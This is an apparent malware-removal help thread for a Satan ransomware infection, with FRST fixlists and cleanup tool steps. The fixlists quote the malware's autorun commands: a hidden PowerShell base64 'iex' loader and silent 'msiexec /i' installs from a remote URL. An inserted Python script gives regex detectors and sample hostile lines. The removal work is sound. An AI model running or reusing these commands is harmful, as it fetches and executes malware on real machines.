rehman004

CLOSED Logs of the scan


Before we get started, I have one question.  Have files on your system been encrypted by Ransomware?


Unfortunately, Satan Ransomware uses a secure encryption method, and cannot be decrypted without paying the ransom.

I can remove the infection itself, but that could result in the files being unencryptable, should you choose to pay the ransom.


Do the following:

Download AdwCleaner and save it on your desktop.

  1. Close all open programs and Internet browsers (you may want to print out or write down these instructions first).
  2. Double click on adwcleaner.exe to run the tool.
  3. Click on the Scan button.
  4. After the scan has finished, click on the Clean button.
  5. Confirm each time with OK.
  6. You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  7. Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
    NOTE: If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer.


Download Junkware Removal Tool and save it on your desktop.

  1. Run the tool by double-clicking it.
  2. The tool will open and start scanning your system.
  3. Please be patient as this can take a while to complete depending on your system's specifications.
  4. On completion, a log is saved to your desktop and will automatically open.
  5. Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply.

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
HKLM\...\Policies\Explorer\Run: [1679292484] => C:\ProgramData\msoorzitb.exe [99972736 2009-07-14] ()
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Run: [comrepl] => C:\Users\Grace\AppData\Roaming\com\comrepl.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Run: [_Z2vçv7OWj.exe] => C:\Users\Grace\AppData\Local\Temp\{3db-7a-36-cf41d-b6bec-447b-2f589}\_Z2vçv7OWj.exe -r1_5 -r2_1 <===== ATTENTION
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Run: [{B8C2A9A9-8875-41C8-8FA7-B0167B60A1EB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\pHlDYLhkMU').KYOOAG)));
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Policies\Explorer\Run: [NVIDIA Corporation] => C:\Users\Grace\AppData\Roaming\Microsoft\vtdajsst\gtbwvsis.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Policies\Explorer\Run: [ocal AppWizard-Generated Applications] => C:\Users\Grace\AppData\Roaming\Microsoft\dwhvrfss\gtbwvsis.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: G - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: H - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {24dceebf-cfd1-11e6-9b0f-00270e1a5fdb} - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {7eb8e89c-49cf-11e6-b24c-00270e1a5fdb} - G:\HiSuiteDownLoader.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {99f09ae6-346e-11e6-997b-806e6f6e6963} - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {9a1b9d76-41f6-11e6-93aa-00270e1a5fdb} - G:\HiSuiteDownLoader.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {ee39bf32-d036-11e6-9ebc-00270e1a5fdb} - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> 
HKLM\...\Providers\q90qys0i: C:\Program Files (x86)\Qerzitainckeriward Launcher\local64spl.dll
ShellExecuteHooks: No Name - {6710C780-E20E-4C49-A87D-321850ED3D7C} -  -> No File
ShellExecuteHooks: No Name - {AD722266-ECD2-11E6-BE37-64006A5CFC23} - C:\Program Files (x86)\Ckanesy\Pherluycogch.dll -> No File
ShellExecuteHooks: No Name - {7E8DA37A-ECD3-11E6-9EC2-64006A5CFC23} - C:\Users\Grace\AppData\Roaming\Reuquy\Shvoghgrash.dll -> No File
ShellExecuteHooks: No Name - {E076ADD8-EEB7-11E6-834F-64006A5CFC23} - C:\Users\Grace\AppData\Roaming\Drevosyvpoph\Qalalyvnity.dll -> No File
ShellExecuteHooks: No Name - {8A2A2C62-EEB8-11E6-9AB6-64006A5CFC23} - C:\Users\Grace\AppData\Roaming\Grjelyckojule\Coosak.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.148966.0\BavShx64.dll -> No File
Startup: C:\Users\Grace\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk [2017-03-08]
ShortcutTarget: Explorer.lnk -> C:\Users\Grace\AppData\Local\Temp\F8FF.tmp.exe (No File)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKU\S-1-5-21-2066707709-1942029407-343316037-1000 -> ielnksrch URL = 
FF SearchPlugin: C:\Users\Grace\AppData\Roaming\Firefox\Firefox\Profiles\g0oplida.default\searchplugins\0_HELP_DECRYPT_FILES.html [2017-03-08]
S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
R2 WinSnare; C:\Users\Grace\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
2017-03-12 19:36 - 2017-03-12 19:36 - 00000000 ____D C:\Users\Grace\AppData\Roaming\Baidu
2017-03-11 00:56 - 2017-03-14 18:29 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-03-08 14:32 - 2017-03-08 14:32 - 00023101 _____ C:\Users\Grace\Downloads\0_HELP_DECRYPT_FILES.html
2017-03-08 14:32 - 2017-03-08 14:32 - 00023101 _____ C:\Users\Grace\0_HELP_DECRYPT_FILES.html
2017-03-08 14:31 - 2017-03-08 14:31 - 00023101 _____ C:\Users\Grace\AppData\Roaming\0_HELP_DECRYPT_FILES.html
2017-03-07 23:06 - 2017-03-07 23:06 - 00023101 _____ C:\Users\Grace\AppData\Local\0_HELP_DECRYPT_FILES.html
2017-03-02 18:34 - 2017-03-02 18:34 - 00000000 _____ C:\Windows\SysWOW64\4
2017-03-02 18:34 - 2017-03-02 18:34 - 00000000 _____ C:\Windows\SysWOW64\3
2017-02-14 22:50 - 2017-02-14 22:51 - 00802104 _____ (Baidu Inc.) C:\Users\Grace\Downloads\Baidu_Cleaner_Setup_Mini_GL62.exe
2017-02-14 21:48 - 2017-03-12 19:37 - 00003544 _____ C:\Windows\System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633
2017-02-14 21:47 - 2017-02-14 23:00 - 00000000 ____D C:\Program Files (x86)\Baidu Security
2017-02-14 21:03 - 2017-03-12 00:21 - 00000000 ____D C:\ProgramData\Baidu
2017-02-14 21:03 - 2017-02-14 21:59 - 00000000 ____D C:\ProgramData\Baidu Security
2017-02-14 15:44 - 2017-02-14 15:44 - 00005988 _____ C:\Windows\System32\Tasks\Coitoy Manager
2017-02-14 15:09 - 2017-02-14 15:09 - 00005986 _____ C:\Windows\System32\Tasks\Gherotyreiferdom Engine
2017-02-14 15:04 - 2017-02-14 15:04 - 00005066 _____ C:\Windows\System32\Tasks\Coecapyzirucult
2017-02-12 12:16 - 2017-02-12 12:16 - 00003664 _____ C:\Windows\System32\Tasks\Wiqukreizasy
2017-02-12 12:11 - 2017-02-12 12:11 - 00006100 _____ C:\Windows\System32\Tasks\Qerzitainckeriward Launcher
2017-03-12 18:28 - 2017-03-14 15:46 - 0000114 _____ () C:\Program Files (x86)\metadata
2017-03-12 18:28 - 2017-03-14 18:28 - 0000040 _____ () C:\Program Files (x86)\settings.dat
2017-03-08 14:31 - 2017-03-08 14:31 - 0023101 _____ () C:\Users\Grace\AppData\Roaming\0_HELP_DECRYPT_FILES.html
2017-03-08 14:31 - 2017-03-08 14:31 - 0006368 _____ () C:\Users\Grace\AppData\Roaming\agguigfyowh.stn
2016-12-04 14:14 - 2016-12-04 14:14 - 1906409 _____ () C:\Users\Grace\AppData\Roaming\Blacktech.tst
2016-12-04 14:13 - 2016-12-04 14:13 - 0190394 _____ () C:\Users\Grace\AppData\Roaming\Dingair.bin
2017-03-08 14:31 - 2017-03-08 14:31 - 7311648 _____ () C:\Users\Grace\AppData\Roaming\ebo.stn
2017-03-08 14:31 - 2017-03-08 14:31 - 0071504 _____ () C:\Users\Grace\AppData\Roaming\hubuamvy.stn
2016-12-04 14:16 - 2016-12-04 14:16 - 1897568 _____ () C:\Users\Grace\AppData\Roaming\Meddox.bin
2017-03-07 17:48 - 2013-10-05 05:38 - 0970912 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Roaming\msvcr120.dll
2017-03-08 14:31 - 2017-03-08 14:31 - 0019232 _____ () C:\Users\Grace\AppData\Roaming\ogyfasirygal.stn
2017-03-07 17:48 - 2017-03-06 13:18 - 1008128 _____ () C:\Users\Grace\AppData\Roaming\RuntimeBrocker.exe
2017-03-08 14:31 - 2017-03-08 14:31 - 0141088 _____ () C:\Users\Grace\AppData\Roaming\tyosywecikimc.stn
2017-03-08 14:31 - 2017-03-08 14:31 - 0127264 _____ () C:\Users\Grace\AppData\Roaming\x.stn
2017-03-08 14:31 - 2017-03-08 14:31 - 0017024 _____ () C:\Users\Grace\AppData\Roaming\zyahacibyzoxpaisbeacuwwoxeirdeuv.stn
2017-03-07 23:06 - 2017-03-07 23:06 - 0023101 _____ () C:\Users\Grace\AppData\Local\0_HELP_DECRYPT_FILES.html
2017-03-08 23:37 - 2017-03-08 23:37 - 1369792 _____ () C:\Users\Grace\AppData\Local\emzas.stn
2017-03-09 18:42 - 2017-03-09 18:42 - 0980992 _____ () C:\Users\Grace\AppData\Local\epsioncixeqeho.stn
2017-03-09 00:10 - 2017-03-09 00:10 - 0110416 _____ () C:\Users\Grace\AppData\Local\geywuzreuggyalahyfofsao.stn
2017-03-07 23:06 - 2017-03-07 23:06 - 0110416 _____ () C:\Users\Grace\AppData\Local\seqiuquswudaeboki.stn
2017-03-07 23:07 - 2017-03-07 23:07 - 0000816 _____ () C:\Users\Grace\AppData\Local\vu.stn
2017-03-08 14:24 - 2017-03-08 14:24 - 2932544 _____ () C:\Users\Grace\AppData\Local\vuuhyq.stn
2017-03-08 23:01 - 2017-03-08 23:01 - 1182896 _____ () C:\Users\Grace\AppData\Local\ybutyrtaiqetd.stn
2017-03-07 23:06 - 2017-03-07 23:06 - 2932304 _____ () C:\Users\Grace\AppData\Local\ynxi.stn
2016-02-07 21:26 - 2016-02-07 21:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-02-27 07:19 - 2017-02-14 23:03 - 0014501 _____ () C:\ProgramData\Duplicaterecord.js
2009-07-14 04:31 - 2009-07-14 06:14 - 99972736 ___SH () C:\ProgramData\msoorzitb.exe
C:\ProgramData\Duplicaterecord.js
C:\ProgramData\msoorzitb.exe
2017-03-06 13:55 - 2017-03-06 13:55 - 1098764 ___RH () C:\Users\Grace\AppData\Local\Temp\93D7.tmp.exe
2017-03-02 17:39 - 2017-03-02 17:39 - 1098417 ___RH () C:\Users\Grace\AppData\Local\Temp\C1F7.tmp.exe
2017-03-10 18:08 - 2009-07-14 06:15 - 0805376 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Local\Temp\cdo1222616280.dll
2017-03-13 22:36 - 2009-07-14 06:15 - 0805376 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Local\Temp\cdo2450072901.dll
2017-03-13 22:36 - 2009-07-14 06:15 - 0805376 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Local\Temp\cdo3457795531.dll
2017-03-01 19:18 - 2017-03-01 19:18 - 1097502 ___RH () C:\Users\Grace\AppData\Local\Temp\DC5A.tmp.exe
2017-03-11 00:52 - 2017-03-11 00:52 - 0237736 _____ (Enigma Software Group USA, LLC.) C:\Users\Grace\AppData\Local\Temp\esg_cleanup.exe
Task: {3A18EE8C-8DD6-4C33-A84A-832CA58FC9D7} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe  <==== ATTENTION
Task: {40A24AB9-E582-4D81-8E4E-2147A1C6B488} - System32\Tasks\Plohis Adapter => C:\Program Files (x86)\Ckikution\plohisAdapterGrq.exe 
Task: {4C2D8775-206A-45BB-952B-94B119E8E89D} - System32\Tasks\Coitoy Manager => C:\Program Files (x86)\Ckerkak\phloge.exe 
Task: {5C24B58E-2A3F-4BB8-90E4-A2DDAD8E2472} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-11] ()
Task: {8BA8F394-7D1B-498D-B9FA-CAAE2929F68D} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Baidu Security\Duplicaterecord.js"
Task: {A1397936-158F-4134-AEBC-0C2D78977607} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe  <==== ATTENTION
Task: {B5B27CFF-37FC-4643-B0F3-B7B260325855} - System32\Tasks\Qerzitainckeriward Launcher => C:\Program Files (x86)\Ckanesy\ribuge.exe 
Task: {F249F686-ED40-4DF8-9661-F5AC0DC443C1} - System32\Tasks\{C7602EA3-B5DF-465F-A0B4-3F5DE00FF4A6} => Chrome.exe 
Task: {F5B0E0A7-5902-4BDE-B4B6-BBC08642BE67} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST3250318AS_6VY5CBVRXXXX6VY5CBVR&v=2017214 /q <==== ATTENTION
Task: {F6F9E79B-D695-4494-8F60-F779277955A7} - System32\Tasks\Wiqukreizasy => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST3250318AS_6VY5CBVRXXXX6VY5CBVR&v=2017212 /q <==== ATTENTION
Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
AlternateDataStreams: C:\Windows\system32\Drivers\gjvmersh.sys:changelist [1078]
C:\Users\Grace\AppData\Roaming\baidu

Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

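A small triage pass over FRST-style autorun lines like those in the fixlist above, flagging the launcher patterns visible there (hidden or policy-bypassing PowerShell, a silent `msiexec /i` from a URL, autoruns from Temp, extra Userinit entries). This is an added example, not part of the original posts or of FRST; the rule labels, function names and sample lines are assumptions constructed for illustration.

```python
import re

# Constructed sample in the FRST log/fixlist layout; names, GUIDs and hosts are placeholders.
SAMPLE = r"""
HKLM\...\Run: [SecurityHealth] => C:\Windows\System32\SecurityHealthSystray.exe
HKU\S-1-5-21-0-0-0-1000\...\Run: [{00000000-0000-0000-0000-000000000001}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\Example').Value)));
HKU\S-1-5-21-0-0-0-1000\...\Run: [updater] => C:\Users\User\AppData\Local\Temp\{aa-bb}\updater.exe -r1
Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\ExampleTask => msiexec /i hxxp://cdn.example.invalid/msi/rel.php?u=ID&v=1 /q
Task: {00000000-0000-0000-0000-000000000003} - System32\Tasks\GoogleUpdate => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
HKLM-x32\...\Winlogon: [Userinit] userinit.exe,,c:\program files (x86)\example\loader.exe
"""

# One autorun entry per line: a Run/Winlogon registry value or a scheduled task.
ENTRY = re.compile(
    r"^(?:HK\S*\\\.\.\.\\(?:Policies\\Explorer\\)?(?P<kind>Run|Winlogon): \[(?P<name>.*?)\] (?:=> )?"
    r"|Task: \{[0-9A-Fa-f-]+\} - (?P<task>.*?) => )(?P<cmd>.*)$"
)

# Heuristic rules (assumed labels) applied to the command part of an entry.
RULES = [
    ("powershell-hidden-or-bypass",
     re.compile(r"powershell(\.exe)?\b.*(-(windowstyle|w)\s+hidden|-(executionpolicy|ep)\s+bypass)", re.I)),
    ("powershell-decodes-base64", re.compile(r"powershell.*frombase64string", re.I)),
    ("msiexec-remote-package",
     re.compile(r"msiexec\"?\s.*/i\s+\"?(https?|hxxps?)://", re.I)),
    ("runs-from-temp", re.compile(r"\\AppData\\Local\\Temp\\", re.I)),
]


def parse(line):
    """Return (kind, name, command) for an autorun line, or None for anything else."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    kind = "Task" if m["task"] else m["kind"]
    return kind, (m["task"] or m["name"]), m["cmd"].strip()


def triage(text):
    """Return [(kind, name, [rule labels])] for entries that match at least one rule."""
    findings = []
    for line in text.splitlines():
        entry = parse(line)
        if entry is None:
            continue
        kind, name, cmd = entry
        hits = [label for label, rx in RULES if rx.search(cmd)]
        # Userinit should list only userinit.exe; anything else starts at every logon.
        if kind == "Winlogon" and name.lower() == "userinit":
            parts = [p.strip() for p in cmd.split(",")]
            if any(p and not p.lower().endswith("userinit.exe") for p in parts):
                hits.append("extra-userinit-entry")
        if hits:
            findings.append((kind, name, hits))
    return findings


if __name__ == "__main__":
    for kind, name, hits in triage(SAMPLE):
        print(f"{kind:8} {name}: {', '.join(hits)}")
```
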

If you still have fixlist.txt the FRST did not load it and run it.  Make sure that both FRST64.exe and fixlist.txt are in the same folder with each other. They are both supposed to be on the Windows Desktop.


Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, and attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.


Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

HKLM-x32\...\Winlogon: [Userinit] userinit.exe,,c:\program files (x86)\microsoft\desktoplayer.exe
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
2017-03-18 23:32 - 2017-03-18 23:32 - 00002932 _____ C:\Windows\System32\Tasks\{E7A9CD2E-5F47-4387-ACAF-B2176D41EAFE}
2017-03-18 23:14 - 2017-03-18 23:14 - 00002932 _____ C:\Windows\System32\Tasks\{D97B9E20-CC66-4388-A7B2-CB74241DC3B1}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{DB6F22AE-51BB-4733-8EA0-D05E5AC5A890}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{8A3AEBB3-9BC6-4C97-A040-CFBEC9EB145A}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{5CD2383A-6FED-4EFB-AC96-1BA9926F4EAC}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{44BF2A5B-1874-4B93-ACED-21A3A191D35F}
2017-03-18 23:11 - 2017-03-18 23:11 - 00002932 _____ C:\Windows\System32\Tasks\{7E42AB03-CA36-4049-B4E8-C8FC2E1D55B7}
2017-03-18 23:04 - 2017-03-18 23:04 - 00002932 _____ C:\Windows\System32\Tasks\{BD4B8FE2-3566-4579-9420-FEB386120F05}
2017-03-18 23:04 - 2017-03-18 23:04 - 00002932 _____ C:\Windows\System32\Tasks\{ADBFB934-6D29-4D6F-A702-7ACCC67E17BE}
2017-03-18 23:04 - 2017-03-18 23:04 - 00002932 _____ C:\Windows\System32\Tasks\{147B2BC0-848D-4330-BD91-BF990A30DF30}
2017-03-18 15:47 - 2017-03-20 17:45 - 0000310 _____ () C:\Program Files (x86)\metadata
2017-03-18 15:47 - 2017-03-21 17:41 - 0000040 _____ () C:\Program Files (x86)\settings.dat
2017-03-20 14:28 - 2017-03-20 14:28 - 0007605 _____ () C:\Users\Grace\AppData\Local\Resmon.ResmonCfg
2017-03-11 00:52 - 2017-03-11 00:52 - 0237736 _____ (Enigma Software Group USA, LLC.) C:\Users\Grace\AppData\Local\Temp\esg_cleanup.exe
2017-03-16 15:12 - 2017-03-16 15:12 - 0000000 _____ () C:\Users\Grace\AppData\Local\Temp\vlc-2.2.4-win32.exe
Task: {261AA4CD-31E2-4984-AFBC-CC35B1D272EA} - \Gherotyreiferdom Engine -> No File <==== ATTENTION
C:\Program Files (x86)\Common Files\Microsoft Shared\Help\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\Smart Tag\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Services\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\ado\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\en-US\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\msadc\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\Ole DB\0_HELP_DECRYPT_FILES.html 
C:\Program Files (x86)\Internet Explorer\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\MSBuild\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\WinRAR\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\Microsoft Shared\Stationery\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\Services\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\ado\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\en-US\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\msadc\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\Ole DB\0_HELP_DECRYPT_FILES.html
C:\Program Files\Internet Explorer\0_HELP_DECRYPT_FILES.html
C:\Program Files\NVIDIA Corporation\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Logic Handler\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft Help\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\eHome\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\IlsCache\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\OFFICE\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\User Account Pictures\0_HELP_DECRYPT_FILES.html
C:\ProgramData\NVIDIA Corporation\GeForce Experience\0_HELP_DECRYPT_FILES.html
C:\ProgramData\NVIDIA Corporation\NetService\0_HELP_DECRYPT_FILES.html
C:\ProgramData\NVIDIA\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\0_HELP_DECRYPT_FILES.html
C:\ProgramData\SecuROM\DFA\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Wondershare Video Editor\Resources\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\Adobe\Color\Profiles\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\CallofDuty4MW\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\CallofDuty4MW\players\profiles\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\CallofDuty4MW\updates\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017021810.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017021819.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017021912.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022317.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022617.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022619.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022708.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022708.001\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030217.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030418.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030610.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030616.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030616.001\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030712.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030818.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030818.001\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\PunkBuster\COD4\pb\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\Temp\NVIDIA Corporation\NV_Cache\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\Wondershare\WSHelper\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\Clip Organizer\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\OIS\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\PowerPoint\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\Templates\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\UProof\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Profiles\Kerhale.default\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\SecuROM\UserData\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\vlc\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\WinRAR\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\WinSAPSvc\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\WinSAPSvc\winsap_update\0_HELP_DECRYPT_FILES.html
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows Mail\Stationery\0_HELP_DECRYPT_FILES.html

Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.


Changing tools:

Download RogueKiller from one of the following links and save it to your desktop:

  • Link 1
  • Link 2

  • Close all programs and disconnect any USB or external drives before running the tool.
  • Double-click RogueKiller.exe to run the tool (Vista/7/8/10 users: Right-click and select Run As Administrator).
  • Once the Prescan has finished, click Scan.
  • Once the Status box shows "Scan Finished", just close the program. <--Don't fix anything!
  • Attach the RogueKiller report to your next reply.
    • The log can also be found on your desktop labeled (RKreport[X]_S_xxdatexx_xtimex)
    • The highest number of [X] is the most recent Scan




This topic is now closed to further replies.